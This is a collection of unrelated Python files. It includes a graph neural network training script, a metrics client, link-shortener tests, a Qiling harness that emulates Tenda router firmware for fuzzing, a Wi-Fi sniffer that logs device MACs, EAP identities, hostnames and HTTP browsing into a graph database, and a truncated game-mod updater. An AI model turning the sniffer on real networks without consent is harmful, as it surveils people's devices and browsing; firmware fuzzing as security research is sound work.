representation of all nodes layer by layer. The nodes # on each layer are of course splitted in batches. # TODO: can we standardize this? for l, layer in enumerate(self.layers): y = th.zeros(g.num_nodes(), self.n_hidden if l != len(self.layers) - 1 else self.n_classes) sampler = dgl.dataloading.MultiLayerFullNeighborSampler(1) dataloader = dgl.dataloading.NodeDataLoader( g, th.arange(g.num_nodes()), sampler, batch_size=args.batch_size, shuffle=True, drop_last=False, num_workers=args.num_workers) for input_nodes, output_nodes, blocks in tqdm.tqdm(dataloader): block = blocks[0].to(device) h = x[input_nodes].to(device) h = layer(block, h) if l != len(self.layers) - 1: h = self.activation(h) h = self.dropout(h) y[output_nodes] = h.cpu() x = y return y class CrossEntropyLoss(nn.Module): def forward(self, block_outputs, pos_graph, neg_graph): with pos_graph.local_scope(): pos_graph.ndata['h'] = block_outputs pos_graph.apply_edges(fn.u_dot_v('h', 'h', 'score')) pos_score = pos_graph.edata['score'] with neg_graph.local_scope(): neg_graph.ndata['h'] = block_outputs neg_graph.apply_edges(fn.u_dot_v('h', 'h', 'score')) neg_score = neg_graph.edata['score'] score = th.cat([pos_score, neg_score]) label = th.cat([th.ones_like(pos_score), th.zeros_like(neg_score)]).long() loss = F.binary_cross_entropy_with_logits(score, label.float()) return loss def compute_acc(emb, labels, train_nids, val_nids, test_nids): """ Compute the accuracy of prediction given the labels. """ emb = emb.cpu().numpy() labels = labels.cpu().numpy() train_nids = train_nids.cpu().numpy() train_labels = labels[train_nids] val_nids = val_nids.cpu().numpy() val_labels = labels[val_nids] test_nids = test_nids.cpu().numpy() test_labels = labels[test_nids] emb = (emb - emb.mean(0, keepdims=True)) / emb.std(0, keepdims=True) lr = lm.LogisticRegression(multi_class='multinomial', max_iter=10000) lr.fit(emb[train_nids], train_labels) pred = lr.predict(emb) f1_micro_eval = skm.f1_score(val_labels, pred[val_nids], average='micro') f1_micro_test = skm.f1_score(test_labels, pred[test_nids], average='micro') return f1_micro_eval, f1_micro_test def evaluate(model, g, nfeat, labels, train_nids, val_nids, test_nids, device): """ Evaluate the model on the validation set specified by ``val_mask``. g : The entire graph. inputs : The features of all the nodes. labels : The labels of all the nodes. val_mask : A 0-1 mask indicating which nodes do we actually compute the accuracy for. device : The GPU device to evaluate on. """ model.eval() with th.no_grad(): # single gpu if isinstance(model, SAGE): pred = model.inference(g, nfeat, device) # multi gpu else: pred = model.module.inference(g, nfeat, device) model.train() return compute_acc(pred, labels, train_nids, val_nids, test_nids) #### Entry point def run(proc_id, n_gpus, args, devices, data): # Unpack data device = devices[proc_id] if n_gpus > 1: dist_init_method = 'tcp://{master_ip}:{master_port}'.format( master_ip='127.0.0.1', master_port='12345') world_size = n_gpus th.distributed.init_process_group(backend="nccl", init_method=dist_init_method, world_size=world_size, rank=proc_id) train_mask, val_mask, test_mask, n_classes, g = data nfeat = g.ndata.pop('feat') labels = g.ndata.pop('label') in_feats = nfeat.shape[1] train_nid = th.LongTensor(np.nonzero(train_mask)).squeeze() val_nid = th.LongTensor(np.nonzero(val_mask)).squeeze() test_nid = th.LongTensor(np.nonzero(test_mask)).squeeze() # Create PyTorch DataLoader for constructing blocks n_edges = g.num_edges() train_seeds = np.arange(n_edges) if n_gpus > 0: num_per_gpu = (train_seeds.shape[0] + n_gpus -1) // n_gpus train_seeds = train_seeds[proc_id * num_per_gpu : (proc_id + 1) * num_per_gpu \ if (proc_id + 1) * num_per_gpu < train_seeds.shape[0] else train_seeds.shape[0]] # Create sampler sampler = dgl.dataloading.MultiLayerNeighborSampler( [int(fanout) for fanout in args.fan_out.split(',')]) dataloader = dgl.dataloading.EdgeDataLoader( g, train_seeds, sampler, exclude='reverse_id', # For each edge with ID e in Reddit dataset, the reverse edge is e ± |E|/2. reverse_eids=th.cat([ th.arange(n_edges // 2, n_edges), th.arange(0, n_edges // 2)]), negative_sampler=NegativeSampler(g, args.num_negs), batch_size=args.batch_size, shuffle=True, drop_last=False, pin_memory=True, num_workers=args.num_workers) # Define model and optimizer model = SAGE(in_feats, args.num_hidden, args.num_hidden, args.num_layers, F.relu, args.dropout) model = model.to(device) if n_gpus > 1: model = DistributedDataParallel(model, device_ids=[device], output_device=device) loss_fcn = CrossEntropyLoss() optimizer = optim.Adam(model.parameters(), lr=args.lr) # Training loop avg = 0 iter_pos = [] iter_neg = [] iter_d = [] iter_t = [] best_eval_acc = 0 best_test_acc = 0 for epoch in range(args.num_epochs): tic = time.time() # Loop over the dataloader to sample the computation dependency graph as a list of # blocks. tic_step = time.time() for step, (input_nodes, pos_graph, neg_graph, blocks) in enumerate(dataloader): batch_inputs = nfeat[input_nodes].to(device) d_step = time.time() pos_graph = pos_graph.to(device) neg_graph = neg_graph.to(device) blocks = [block.int().to(device) for block in blocks] # Compute loss and prediction batch_pred = model(blocks, batch_inputs) loss = loss_fcn(batch_pred, pos_graph, neg_graph) optimizer.zero_grad() loss.backward() optimizer.step() t = time.time() pos_edges = pos_graph.num_edges() neg_edges = neg_graph.num_edges() iter_pos.append(pos_edges / (t - tic_step)) iter_neg.append(neg_edges / (t - tic_step)) iter_d.append(d_step - tic_step) iter_t.append(t - d_step) if step % args.log_every == 0: gpu_mem_alloc = th.cuda.max_memory_allocated() / 1000000 if th.cuda.is_available() else 0 print('[{}]Epoch {:05d} | Step {:05d} | Loss {:.4f} | Speed (samples/sec) {:.4f}|{:.4f} | Load {:.4f}| train {:.4f} | GPU {:.1f} MB'.format( proc_id, epoch, step, loss.item(), np.mean(iter_pos[3:]), np.mean(iter_neg[3:]), np.mean(iter_d[3:]), np.mean(iter_t[3:]), gpu_mem_alloc)) tic_step = time.time() if step % args.eval_every == 0 and proc_id == 0: eval_acc, test_acc = evaluate(model, g, nfeat, labels, train_nid, val_nid, test_nid, device) print('Eval Acc {:.4f} Test Acc {:.4f}'.format(eval_acc, test_acc)) if eval_acc > best_eval_acc: best_eval_acc = eval_acc best_test_acc = test_acc print('Best Eval Acc {:.4f} Test Acc {:.4f}'.format(best_eval_acc, best_test_acc)) toc = time.time() if proc_id == 0: print('Epoch Time(s): {:.4f}'.format(toc - tic)) if epoch >= 5: avg += toc - tic if n_gpus > 1: th.distributed.barrier() if proc_id == 0: print('Avg epoch time: {}'.format(avg / (epoch - 4))) def main(args, devices): # load reddit data data = RedditDataset(self_loop=False) n_classes = data.num_classes g = data[0] train_mask = g.ndata['train_mask'] val_mask = g.ndata['val_mask'] test_mask = g.ndata['test_mask'] # Create csr/coo/csc formats before launching training processes with multi-gpu. # This avoids creating certain formats in each sub-process, which saves momory and CPU. g.create_formats_() # Pack data data = train_mask, val_mask, test_mask, n_classes, g n_gpus = len(devices) if devices[0] == -1: run(0, 0, args, ['cpu'], data) elif n_gpus == 1: run(0, n_gpus, args, devices, data) else: procs = [] for proc_id in range(n_gpus): p = mp.Process(target=thread_wrapped_func(run), args=(proc_id, n_gpus, args, devices, data)) p.start() procs.append(p) for p in procs: p.join() if __name__ == '__main__': argparser = argparse.ArgumentParser("multi-gpu training") argparser.add_argument("--gpu", type=str, default='0', help="GPU, can be a list of gpus for multi-gpu trianing," " e.g., 0,1,2,3; -1 for CPU") argparser.add_argument('--num-epochs', type=int, default=20) argparser.add_argument('--num-hidden', type=int, default=16) argparser.add_argument('--num-layers', type=int, default=2) argparser.add_argument('--num-negs', type=int, default=1) argparser.add_argument('--neg-share', default=False, action='store_true', help="sharing neg nodes for positive nodes") argparser.add_argument('--fan-out', type=str, default='10,25') argparser.add_argument('--batch-size', type=int, default=10000) argparser.add_argument('--log-every', type=int, default=20) argparser.add_argument('--eval-every', type=int, default=1000) argparser.add_argument('--lr', type=float, default=0.003) argparser.add_argument('--dropout', type=float, default=0.5) argparser.add_argument('--num-workers', type=int, default=0, help="Number of sampling processes. Use 0 for no extra process.") args = argparser.parse_args() devices = list(map(int, args.gpu.split(','))) main(args, devices)
client.py
#!/usr/bin/python # -*- coding: utf-8 -*- ''' Description: Tirion client ''' import numpy import os import socket import sys import threading from __init__ import __version__ class Client: """Tirion client""" __LOG_PREFIX = "[client]" __TIRION_BUFFER_SIZE = 4096 __TIRION_TAG_SIZE = 513 def __init__(self, socket_filename, verbose): """Tirion client constructor @param socket_filename the socket filepath to connect to the agent @param verbose enable or disable verbose output of the client library """ self.__command_thread = None self.__count = 0 self.__metrics = None self.__metric_lock = None self.__net = None self.__running = False self.__socket = socket_filename self.__verbose_output = verbose def init(self): """Initialize a Tirion client object""" os.setsid() self.verbose("Open unix socket to {}", self.__socket) self.__net = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) try: self.__net.connect(self.__socket) except socket.error as err: raise RuntimeError("Cannot initialize socket: " + str(err)) self.verbose("Request tirion protocol version v{}", __version__) self.__send("tirion v" + __version__ + "\tmmap") header = self.__receive().split("\t") if len(header) < 2 or len(header[1]) == 0: raise RuntimeError("Did not receive correct metric count and mmap filename") try: self.__count = int(header[0]) except ValueError: self.error("Did not receive correct metric count") raise RuntimeError("Metric count is not a number") self.__metric_lock = threading.Lock() if not header[1].startswith("mmap://"): raise RuntimeError("Did not receive correct mmap filename") mmap_filename = header[1][7:] self.verbose("Received metric count {} and mmap filename {}", self.__count, mmap_filename) self.__metrics = numpy.memmap(mmap_filename, dtype='float32', mode='r+', shape=(self.__count,)) self.verbose("Initialized metric collector mmap") self.__running = True # we want to handle commands not in the main thread self.__command_thread = threading.Thread(target=Client.__handle_commands, args=(self,)) self.__command_thread.start() def close(self): """Uninitialized a Tirion client object""" self.__running = False if self.__metric_lock is not None: self.__metric_lock.acquire() if self.__metrics is not None: # self.__metrics.close() self.__metrics = None if self.__net is not None: self.__net.shutdown(socket.SHUT_RDWR) self.__net.close() self.__net = None if self.__command_thread is not None: self.__command_thread.join() self.__command_thread = None if self.__metric_lock is not None: self.__metric_lock.release() def destroy(self): """Cleanup everything that was allocated by the Tirion client object""" self.__metric_lock = None def get(self, index): """Return the current value of a metric @param index the index of the metric @return the value of the metric """ if index < 0 or index >= self.__count or self.__metric_lock is None or self.__metrics is None: return 0.0 return self.__metrics[index] def set(self, index, value): """Set a value for a metric @param index the index of the metric @param value the value to be set to the metric @return the new value of the metric """ if index < 0 or index >= self.__count or self.__metric_lock is None: return 0.0 ret = 0.0 self.__metric_lock.acquire() if self.__metrics is not None: ret = value self.__metrics[index] = ret self.__metric_lock.release() return ret def add(self, index, value): """Add a value to a metric @param index the index of the metric @param value the value to be add to the metric @return the new value of the metric """ if index < 0 or index >= self.__count or self.__metric_lock is None: return 0.0 ret = 0.0 self.__metric_lock.acquire() if self.__metrics is not None: ret = self.__metrics[index] + value self.__metrics[index] = ret self.__metric_lock.release() return ret def dec(self, index): """Decrement a metric by 1.0 @param index the index of the metric @return the new value of the metric """ return self.add(index, -1.0) def inc(self, index): """Increment a metric by 1.0 @param index the index of the metric @return the new value of the metric """ return self.add(index, 1.0) def sub(self, index, value): """Subtract a value of a metric @param index the index of the metric @param value the value to be subtracted of the metric @return the new value of the metric """ return self.add(index, -value) def running(self): """States if the Tirion Client object is running @return running state """ return self.__running def tag(self, format_string, *args): """Send a tag to the agent @param format_string the tag string that follows the same specifications as format_string in string.format @param args additional arguments for format_string """ self.__send(self.__prepare_tag("t" + format_string.format(*args))) def __message(self, message_type, format_string, *args): """Output a Tirion message""" if not self.__verbose_output: return sys.stderr.write(Client.__LOG_PREFIX + "[" + message_type + "] " + format_string.format(*args) + "\n") def debug(self, format_string, *args): """Output a Tirion debug message @param format_string the message string that follows the same specifications as format_string in string.format @param args additional arguments for format_string """ self.__message("debug", format_string, *args) def error(self, format_string, *args): """Output a Tirion error message @param format_string the message string that follows the same specifications as format_string in string.format @param args additional arguments for format_string """ self.__message("error", format_string, *args) def verbose(self, format_string, *args): """Output a Tirion verbose message @param format_string the message string that follows the same specifications as format_string in string.format @param args additional arguments for format_string """ self.__message("verbose", format_string, *args) def __prepare_tag(self, tag): """Prepare a tag string for sending""" if len(tag) > self.__TIRION_TAG_SIZE: tag = tag[:self.__TIRION_TAG_SIZE] return tag.replace("\n", " ") def __receive(self): """Receive a message over the unix socket""" msg = self.__net.recv(self.__TIRION_BUFFER_SIZE) if msg == '': raise RuntimeError("socket connection broken") return msg.strip() def __send(self, msg): """Sent a message over the unix socket""" msg_len = len(msg) total = 0 while total < msg_len: sent = self.__net.send(msg[total:]) if sent == 0: raise RuntimeError("socket connection broken") total = total + sent def __handle_commands(self): """Handle commands received from the agent""" self.verbose("Start listening to commands") while self.__running: try: rec = self.__receive() com = rec[0] self.error("Unknown command '{}'", com) except RuntimeError as err: self.error("Unix socket error: {}", err) self.__running = False self.verbose("Stop listening to commands")
test_tinyurl_link.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import ecstasy import pyperclip import pytest import requests import threading from collections import namedtuple import tests.paths import lnk.tinyurl.link def shorten(url): response = requests.get('http://tiny-url.info/api/v1/create', params=dict(apikey='0BFA4A7B5BDD5BE7780C', format='json', provider='tinyurl_com', url=url)) data = response.json() return data['shorturl'] @pytest.fixture(scope='module') def fixture(): Fixture = namedtuple('Fixture', ['link', 'long', 'short', 'formatted']) link = lnk.tinyurl.link.Link(raw=True) url = 'https://www.github.com/goldsborough/lnk' short = shorten(url) formatted = ecstasy.beautify('<{0}>'.format(short), ecstasy.Style.Bold) return Fixture(link, url, short, formatted) def test_copy_copies_to_clipboard_if_copy_true(fixture): fixture.link.copy(True, fixture.short) assert pyperclip.paste() == fixture.short def test_copy_copies_only_first_url(fixture): assert fixture.link.already_copied fixture.link.copy(True, 'a') fixture.link.copy(True, 'b') fixture.link.copy(True, 'c') assert pyperclip.paste() == fixture.short def test_copy_copies_to_clipboard_if_copy_false(fixture): pyperclip.copy('original') fixture.link.copy(False, fixture.short) assert pyperclip.paste() == 'original' def test_copy_makes_copied_url_bold(fixture): fixture.link.already_copied = False returned_url = fixture.link.copy(True, fixture.short) assert returned_url == fixture.formatted def test_request_shortens_well(fixture): result = fixture.link.request(fixture.long) assert result == fixture.short def test_shorten_formats_well(fixture): result = [] fixture.link.shorten(result, False, True, True, fixture.long) expected = '{0} => {1}'.format(fixture.long, fixture.short) assert result[0] == expected def test_shorten_warns_about_url_without_protocol(fixture, capsys): fixture.link.shorten([], False, False, False, 'google.com') out = capsys.readouterr() assert out assert out[0].startswith("\aWarning: Prepending 'http://' to") def test_fetch_works_for_single_url(fixture): result = fixture.link.fetch(False, True, [fixture.long], False) assert result == [fixture.short] def test_fetch_works_for_many_urls(fixture): urls = ['http://facebook.com', 'http://google.com', 'http://python.org'] result = set(fixture.link.fetch(False, True, urls, False)) expected = set() threads = [] for url in urls: thread = threading.Thread(target=lambda u: expected.add(shorten(u)), args=(url,)) thread.daemon = True thread.start() threads.append(thread) for thread in threads: thread.join(timeout=10) assert result == expected def test_fetch_correct_output_if_raw_false_pretty_false(fixture): fixture.link.raw = False urls = [fixture.long, 'http://python.org'] result = fixture.link.fetch(False, True, urls, False) expected = '\n'.join([fixture.short, shorten(urls[1])]) return result == expected
saver_tendaac15_httpd.py
#!/usr/bin/env python3 # # Cross Platform and Multi Architecture Advanced Binary Emulation Framework # # 1. Download AC15 Firmware from https://down.tenda.com.cn/uploadfile/AC15/US_AC15V1.0BR_V15.03.05.19_multi_TD01.zip # 2. unzip # 3. binwalk -e US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin # 4. locate squashfs-root # 5. rm -rf webroot && mv webroot_ro webroot # # notes: we are using rootfs in this example, so rootfs = squashfs-root # import ctypes, os, pickle, socket, sys, threading sys.path.append("..") from qiling import * from qiling.const import QL_VERBOSE def nvram_listener(): server_address = 'rootfs/var/cfm_socket' data = "" try: os.unlink(server_address) except OSError: if os.path.exists(server_address): raise # Create UDS socket sock = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM) sock.bind(server_address) sock.listen(1) while True: connection, client_address = sock.accept() try: while True: data += str(connection.recv(1024)) if "lan.webiplansslen" in data: connection.send('192.168.170.169'.encode()) else: break data = "" finally: connection.close() def save_context(ql, *args, **kw): ql.save(cpu_context=False, snapshot="snapshot.bin") def patcher(ql): br0_addr = ql.mem.search("br0".encode() + b'\x00') for addr in br0_addr: ql.mem.write(addr, b'lo\x00') def check_pc(ql): print("=" * 50) print("Hit fuzz point, stop at PC = 0x%x" % ql.reg.arch_pc) print("=" * 50) ql.emu_stop() def my_sandbox(path, rootfs): ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG) ql.add_fs_mapper("/dev/urandom","/dev/urandom") ql.hook_address(save_context ,0x10930) ql.hook_address(patcher, ql.loader.elf_entry) ql.hook_address(check_pc,0x7a0cc) ql.run() if __name__ == "__main__": nvram_listener_therad = threading.Thread(target=nvram_listener, daemon=True) nvram_listener_therad.start() my_sandbox(["rootfs/bin/httpd"], "rootfs")
vifi.py
#!/usr/bin/env python3 import logging import os.path import re import time from multiprocessing import Process, JoinableQueue, cpu_count from sys import argv from os import nice import pdb from py2neo import remote from py2neo.database import Graph, Node, Relationship from scapy.all import * from scapy_http.http import * graph = None def get_connection(connection_type, from_node_name, to_node_name): for _ in ['', '\0', '00:00:00:00:00:00', 'ff:ff:ff:ff:ff:ff']: if _ in [from_node_name, to_node_name]: return for name in [from_node_name, to_node_name]: if re.search(r'([0-9a-f]{2}[:]){5}([0-9a-f]{2})', name) and (name.lower()[1] in ['2', '6', 'a', 'e'] or name.startswith('33:33:')): return from_node = None to_node = None if connection_type in ['WIFI/MGMT/BEACON', 'WIFI/MGMT/PROBE_REQUEST', 'WIFI/MGMT/PROBE_RESPONSE/MAC_SENT_SSID']: from_node = Node('device', mac_address=from_node_name) to_node = Node('network', essid=to_node_name) elif connection_type in ['WIFI/MGMT/PROBE_RESPONSE/MAC_RECV_SSID']: from_node = Node('network', essid=from_node_name) to_node = Node('device', mac_address=to_node_name) elif connection_type in ['WIFI/CTRL/ACK', 'ETHER/GEN/MAC_TO_MAC', 'EAP/IDENTITY/SENT_RESPONSE', 'EAP/IDENTITY/SENT_REQUEST']: from_node = Node('device', mac_address=from_node_name) to_node = Node('device', mac_address=to_node_name) elif connection_type in ['EAP/IDENTITY/RESPONSE']: from_node = Node('device', mac_address=from_node_name) to_node = Node('identity', identity=to_node_name) elif connection_type in ['EAP/IDENTITY/RECV_RESPONSE']: from_node = Node('identity', identity=from_node_name) to_node = Node('device', mac_address=to_node_name) elif connection_type in ['ARP/IS_AT', 'ARP/WHO_HAS', 'DHCP/ACK/ROUTER', 'DHCP/ACK/NAME_SERVER', 'DHCP/OFFER/ROUTER', 'DHCP/OFFER/NAME_SERVER', 'BOOTP/YIADDR', 'ETHER/IP/TRANSMITS_IP', 'ETHER/IP/RECEIVES_IP']: from_node = Node('device', mac_address=from_node_name) to_node = Node('ip', ip_address=to_node_name) elif connection_type in ['DHCP/DISCOVER/HOSTNAME', 'DHCP/ACK/DOMAIN', 'DHCP/OFFER/DOMAIN']: from_node = Node('device', mac_address=from_node_name) to_node = Node('hostname', hostname=to_node_name) elif connection_type in ['IP/PORT']: from_node = Node('ip', ip_address=from_node_name) to_node = Node('ip_port', port_name=to_node_name) elif connection_type in ['IP/PORT/TRAFFIC']: from_node = Node('ip_port', port_name=from_node_name) to_node = Node('ip_port', port_name=to_node_name) elif connection_type in ['IP/TRAFFIC']: from_node = Node('ip', ip_address=from_node_name) to_node = Node('ip', ip_address=to_node_name) elif connection_type in ['HTTP/REQUEST/HOST', 'HTTP/RESPONSE/HOST']: from_node = Node('ip', ip_address=from_node_name) to_node = Node('hostname', hostname=to_node_name) elif connection_type in ['HTTP/REQUEST/USER_AGENT']: from_node = Node('ip', ip_address=from_node_name) to_node = Node('useragent', ua_string=to_node_name) elif connection_type in ['HTTP/REQUEST/PATH_REQUESTED']: from_node = Node('ip', ip_address=from_node_name) to_node = Node('resource', uri=to_node_name) if from_node is None or to_node is None: logger.debug('connection_type', connection_type, 'from_node_name', from_node_name, 'from_node', from_node, 'to_node_name', to_node_name, 'to_node', to_node) raise Exception('Unknown connection type {}'.format(connection_type)) rel = Relationship(from_node, connection_type, to_node) return rel def register_connection(connection): if connection is None: raise Exception() graph.merge(connection) def pktInfoDecodeable(pkt): try: pkt.info.decode() return True except: return False def do_dpi(pkt): connections = [] if pkt.haslayer(EAP): eap = pkt.getlayer(EAP) if eap.code == 1: # EAP code=request if eap.type == 1: # EAP type=identity connections.append(('EAP/IDENTITY/SENT_REQUEST', pkt.addr2, pkt.addr1)) else: logger.debug('Unknown EAP type', eap.code, eap.type) elif eap.code == 2: # EAP code=response if eap.type == 1: # EAP type=identity connections.append(('EAP/IDENTITY/RESPONSE', pkt.addr2, eap.identity.decode())) connections.append(('EAP/IDENTITY/SENT_RESPONSE', pkt.addr2, pkt.addr1)) connections.append(('EAP/IDENTITY/RECV_RESPONSE', eap.identity.decode(), pkt.addr1)) else: logger.debug('Unknown EAP type', eap.code, eap.type) else: logger.debug('DEBUG: Unknown EAP code', eap.code) elif pkt.haslayer(IP): ip = pkt.getlayer(IP) connections.append(('ETHER/IP/TRANSMITS_IP', pkt.addr2, ip.src)) connections.append(('ETHER/IP/RECEIVES_IP', pkt.addr1, ip.dst)) port_type = 'ERROR' if pkt.haslayer(UDP): port_type = 'udp' if pkt.haslayer(DHCP): bootp = pkt.getlayer(BOOTP) dhcp = pkt.getlayer(DHCP) options = {} for option in dhcp.options: if option in ['end', 'pad']: continue options[option[0]] = option[1:] options['message-type'] = options['message-type'][0] if options['message-type'] == 1: # DISCOVER # TODO: Use option 61 if available instead of pkt.addr2 if 'hostname' in options.keys(): connections.append(('DHCP/DISCOVER/HOSTNAME', pkt.addr2, options['hostname'][0].decode())) elif options['message-type'] == 2: # OFFER connections.append(('BOOTP/YIADDR', pkt.addr1, bootp.yiaddr)) if 'router' in options.keys(): for router in options['router']: connections.append(('DHCP/OFFER/ROUTER', pkt.addr1, router)) if 'name_server' in options.keys(): for name_server in options['name_server']: connections.append(('DHCP/OFFER/NAME_SERVER', pkt.addr1, name_server)) if 'domain' in options.keys(): for domain in options['domain']: connections.append(('DHCP/OFFER/DOMAIN', pkt.addr1, domain.decode().replace('\x00', ''))) elif options['message-type'] == 5: # ACK connections.append(('BOOTP/YIADDR', pkt.addr2, bootp.yiaddr)) if 'router' in options.keys(): for router in options['router']: connections.append(('DHCP/ACK/ROUTER', pkt.addr2, router)) if 'name_server' in options.keys(): for name_server in options['name_server']: connections.append(('DHCP/ACK/NAME_SERVER', pkt.addr2, name_server)) if 'domain' in options.keys(): for domain in options['domain']: connections.append(('DHCP/ACK/DOMAIN', pkt.addr2, domain.decode().replace('\x00', ''))) else: logger.debug('DHCP unknown message-type', options['message-type']) elif pkt.haslayer(TCP): port_type = 'tcp' if port_type != 'ERROR': src_port_name = (ip.src if ip.version == 4 else '[' + str(ip.src) + ']') + ':' + str(ip.sport) + '/' + port_type dst_port_name = (ip.dst if ip.version == 4 else '[' + str(ip.dst) + ']') + ':' + str(ip.dport) + '/' + port_type connections.append(('IP/PORT', ip.src, src_port_name)) connections.append(('IP/PORT', ip.dst, dst_port_name)) connections.append(('IP/PORT/TRAFFIC', src_port_name, dst_port_name)) if pkt.haslayer(HTTP): http = pkt.getlayer(HTTP) if pkt.haslayer(HTTPResponse): http_response = http.getlayer(HTTPResponse) if 'Host' in http_response.fields: connections.append(('HTTP/RESPONSE/HOST', ip.src, http_response.fields['Host'].decode())) elif pkt.haslayer(HTTPRequest): http_request = http.getlayer(HTTPRequest) if 'Host' in http_request.fields: connections.append(('HTTP/REQUEST/HOST', ip.src, http_request.fields['Host'].decode())) if 'Path' in http_request.fields: hostname = http_request.fields['Host'].decode() if 'Host' in http_request.fields else ip.dst path = http_request.fields['Path'].decode() full_path = 'http://' + hostname + path connections.append(('HTTP/REQUEST/PATH_REQUESTED', ip.src, full_path)) if 'User-Agent' in http_request.fields: connections.append(('HTTP/REQUEST/USER_AGENT', ip.src, http_request.fields['User-Agent'].decode())) elif pkt.haslayer(ARP): arp = pkt.getlayer(ARP) if arp.op == arp.is_at: connections.append(('ARP/IS_AT', arp.hwsrc, arp.psrc)) elif arp.op == arp.who_has: connections.append(('ARP/WHO_HAS', arp.hwsrc, arp.pdst)) return connections def PacketHandler(pkt): connections = [] if pkt.haslayer(Dot11): if pkt.type == 0: if pkt.subtype == 4: if not pktInfoDecodeable(pkt): return connections.append(('WIFI/MGMT/PROBE_REQUEST', pkt.addr2, pkt.info.decode())) elif pkt.subtype == 5: if not pktInfoDecodeable(pkt): return connections.append(('WIFI/MGMT/PROBE_RESPONSE/MAC_RECV_SSID', pkt.info.decode(), pkt.addr1)) connections.append(('WIFI/MGMT/PROBE_RESPONSE/MAC_SENT_SSID', pkt.addr3, pkt.info.decode())) connections.append(('ETHER/GEN/MAC_TO_MAC', pkt.addr3, pkt.addr1)) elif pkt.subtype == 8: if not pktInfoDecodeable(pkt): return connections.append(('WIFI/MGMT/BEACON', pkt.addr2, pkt.info.decode())) elif pkt.type == 2: # TODO: Find out who sends what to whom, add ETHER/GEN/MAC_TO_MAC if pkt.FCfield & 0x40 == 0: connections += do_dpi(pkt) else: connections += do_dpi(pkt) return connections def sniffer(sniffer_queue, db_queue): nice(1) # Be a little nicer than the DB-thread prev_rels = [] rel_meta = {} def purge_rel_meta(): nonlocal prev_rels, rel_meta for rel in prev_rels: db_queue.put(('update_rel', (rel, rel_meta[rel]))) rel_meta = {} prev_rels = [] while True: job = sniffer_queue.get() if job is None: break frame_count = 0 def _sniffer(rels, pkt): nonlocal frame_count, prev_rels, rel_meta frame_count += 1 if rels is not None: for rel in rels: if rel is None: continue if rel not in prev_rels: db_queue.put(('new_rel', rel)) prev_rels.append(rel) rel_meta[rel] = { 'times': 1, 'first_seen': pkt.time, 'last_seen': pkt.time } else: rel_meta[rel]['times'] += 1 if pkt.time < rel_meta[rel]['first_seen']: rel_meta[rel]['first_seen'] = pkt.time elif pkt.time > rel_meta[rel]['last_seen']: rel_meta[rel]['last_seen'] = pkt.time if (frame_count % 100000) == 0: purge_rel_meta() start_time = time.time() if job == '*': sniff(store=0, prn=lambda p: _sniffer(PacketHandler(p), p)) elif os.path.isfile(job): sniff(offline=job, store=0, prn=lambda p: _sniffer(PacketHandler(p), p)) else: sniff(iface=job, store=0, prn=lambda p: _sniffer(PacketHandler(p), p)) end_time = time.time() sniffer_queue.task_done() purge_rel_meta() db_queue.put(None) def db_worker(top_count, db_queue): existing_rels = [] while True: try: job = db_queue.get() if job is None: top_count -= 1 if top_count == 0: break else: job_type, job_value = job if job_type == 'new_rel': if job_value in existing_rels: continue existing_rels.append(job_value) existing_rels = existing_rels[-100000:] register_connection(get_connection(*job_value)) elif job_type == 'update_rel': pass else: raise Exception('Unknown job_type', job_type) db_queue.task_done() except: pass logger = logging.getLogger() print('Connecting to graph') graph = Graph(password='password') # TODO: parameterize, don't hardcode password def main(): sniffer_count = min([cpu_count(), len(argv[1:])]) sniffer_queue = JoinableQueue() db_queue = JoinableQueue() for filename in argv[1:]: if os.path.isfile(filename): print('Will be loading from file', filename) else: print('Will sniff from interface', filename) sniffer_queue.put(filename) if argv[1:] == []: sniffer_queue.put('*') if sniffer_count == 0: sniffer_count = 1 sniffers = [] for _ in range(sniffer_count): p = Process(target=sniffer, args=(sniffer_queue, db_queue)) p.start() sniffers.append(p) sniffer_queue.put(None) db_proc = Process(target=db_worker, args=(sniffer_count, db_queue)) db_proc.start() interfaces = [] sniffer_queue.close() db_proc.join() for _ in sniffers: _.join() if __name__=='__main__': main()
mod_modPackInformer.py
# -*- coding: utf-8 -*- import json import os import threading import urllib import urllib2 import BigWorld import ResMgr from gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID, ConfirmDialogButtons, SimpleDialogMeta from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView from gui import DialogsInterface, SystemMessages, makeHtmlString from notification.NotificationListView import NotificationListView from constants import AUTH_REALM from helpers import getLanguageCode from adisp import process from gui.Scaleform.daapi.view.common.BaseTicker import BaseTicker from helpers import dependency from skeletons.gui.game_control import IBrowserController, IExternalLinksController class Config(object): def __init__(self): self.data = { 'version' : '', 'name' : '', 'serverMain' : '', 'serverBackup' : '', 'statistic' : False, 'statisticTid' : '', 'openLinkInGameBrowser': False } xml = ResMgr.openSection('scripts/client/gui/mods/mod_modPackInformer.xml') if xml is not None: self.data['version'] = '%s' % xml.readString('version', '') self.data['name'] = '%s' % xml.readString('name', '') self.data['serverMain'] = '%s' % xml.readString('serverMain', '') self.data['serverBackup'] = '%s' % xml.readString('serverBackup', '') self.data['statistic'] = xml.readBool('statistic', False) self.data['statisticTid'] = '%s' % xml.readString('statisticTid', '') self.data['openLinkInGameBrowser'] = xml.readBool('openLinkInGameBrowser', False) class Updater(object): def __init__(self): self.show = True self.count = 0 self.lin1 = '' def start(self): if not updater.show: return try: f = urllib2.urlopen(config.data['serverMain']) except StandardError: f = None if f is None or f.getcode() is not 200: try: f = urllib2.urlopen(config.data['serverBackup']) except StandardError: f = None if f is not None and f.getcode() is 200: mod_text = '' json_text = json.loads(f.read().decode('utf-8-sig')) if config.data['version'] != '%s' % json_text['version']: self.show = False if json_text['header']: mod_text += '%s' % json_text['header'].format(**json_text) if json_text['image']: try: image = 'img://gui/html/%s' % json_text['imageName'] path = os.path.realpath(os.path.join('./res/gui/html', '%s' % json_text['imageName'])) if not os.path.exists(path): urllib.urlretrieve('%s' % json_text['imageLink'], path) except StandardError: image = '' path = '' if image and path and os.path.exists(path): mod_text += '<br/><img src=\"%s\" width=\"%s\" height=\"%s\">' % (image, json_text['imageWidth'], json_text['imageHeight']) if json_text['message']: mod_text += '<br/>%s' % json_text['message'].format(**json_text) self.lin1 = '%s' % json_text['link'] DialogsInterface.showDialog(SimpleDialogMeta(json_text['windowName'], mod_text, ConfirmDialogButtons(json_text['buttonNameOpen'], json_text['buttonNameClose']), None), 